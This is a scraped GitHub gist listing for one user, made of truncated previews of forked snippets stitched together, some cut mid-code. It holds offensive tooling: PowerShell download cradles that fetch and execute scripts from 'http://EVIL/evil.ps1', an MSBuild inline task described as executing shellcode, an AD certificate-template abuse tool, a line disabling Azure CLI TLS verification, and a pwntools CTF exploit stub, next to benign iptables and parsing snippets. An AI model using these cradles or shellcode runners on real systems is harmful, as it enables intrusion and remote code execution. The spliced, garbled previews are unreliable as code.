@Reboare
Reboare / SharpApprover.cs
Created October 26, 2021 13:23 — forked from dmchell/SharpApprover.cs
Reset the mspki-enrollment-flag attribute when you possess a write ACE on a vulnerable certificate template
using System;
using System.DirectoryServices;
namespace SharpApprover
{
class Program
{
public static void SetAdInfo(string objectFilter,
int objectValue, string LdapDomain)
use std::ptr::null_mut;
use std::mem::{size_of, transmute};
use std::ffi::CString;
use winapi::shared::minwindef::{BYTE, TRUE};
use winapi::um::processthreadsapi::{InitializeProcThreadAttributeList, LPSTARTUPINFOA, CreateProcessA,
PROC_THREAD_ATTRIBUTE_LIST, UpdateProcThreadAttribute,
PROCESS_INFORMATION};
use winapi::shared::ntdef::PVOID;
use winapi::um::winbase::STARTUPINFOEXA;
@Reboare
Reboare / gist:2cfcf2ddd07f2ef18c1b3de94a67e0b2
Created September 24, 2019 14:08
Azure CLI disable HTTPS verification
export AZURE_CLI_DISABLE_CONNECTION_VERIFICATION=anycontent
@Reboare
Reboare / DownloadCradles.ps1
Created September 19, 2019 09:30 — forked from HarmJ0y/DownloadCradles.ps1
Download Cradles
# normal download cradle
IEX (New-Object Net.Webclient).downloadstring("http://EVIL/evil.ps1")
# PowerShell 3.0+
IEX (iwr 'http://EVIL/evil.ps1')
# hidden IE com object
$ie=New-Object -comobject InternetExplorer.Application;$ie.visible=$False;$ie.navigate('http://EVIL/evil.ps1');start-sleep -s 5;$r=$ie.Document.body.innerHTML;$ie.quit();IEX $r
# Msxml2.XMLHTTP COM object
@Reboare
Reboare / IPTABLES-CHEATSHEET.md
Created August 18, 2019 20:08 — forked from davydany/IPTABLES-CHEATSHEET.md
IP Tables (iptables) Cheat Sheet

IPTables is the Firewall service that is available in a lot of different Linux Distributions. While modifying it might seem daunting at first, this Cheat Sheet should be able to show you just how easy it is to use and how quickly you can be on your way mucking around with your firewall.

Resources

The following list is a great set of documentation for iptables. I used them to compile this documentation.

<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<!-- This inline task executes shellcode. -->
<!-- C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe SimpleTasks.csproj -->
<!-- Save This File And Execute The Above Command -->
<!-- Author: Casey Smith, Twitter: @subTee -->
<!-- License: BSD 3-Clause -->
<Target Name="Hello">
<ClassExample />
</Target>
<UsingTask
@Reboare
Reboare / linux_net_tcp.py
Last active October 29, 2023 14:29 — forked from sp3c73r2038/linux_net_tcp.py
a toolkit Python script looking into /proc/net/tcp
# -*- coding: utf-8 -*-
import re
import sys
def process_file(procnet):
    sockets = procnet.split('\n')[1:-1]
    return [line.strip() for line in sockets]
def split_every_n(data, n):
@Reboare
Reboare / README.md
Created February 13, 2018 14:56 — forked from FrankSpierings/README.md
Linux Container Escapes and Hardening
from pwn import *
import struct
r = remote('ctf.sharif.edu', 4801)
#r = process('./vuln4')
first = r.recvuntil('find puts yourself')
'''
EIP+0 found at offset: 22
'''
x = 'A'*22
# ordinal=004 plt=0x080483a0 bind=GLOBAL type=FUNC name=puts
#https://www.cs.bham.ac.uk/~mdr/teaching/modules04/java2/TilesSolvability.html
import re
puzzles = []
with open('puzzles.txt') as f_puzzles:
    r_puzzles = f_puzzles.read()
for x in re.finditer("Puzzle for",r_puzzles):
    puzzle = r_puzzles[x.start():x.start()+132]
    puzzle = [x[1:-1].split('|') for x in puzzle.split('\n')[1:] if '+' not in x and x != '']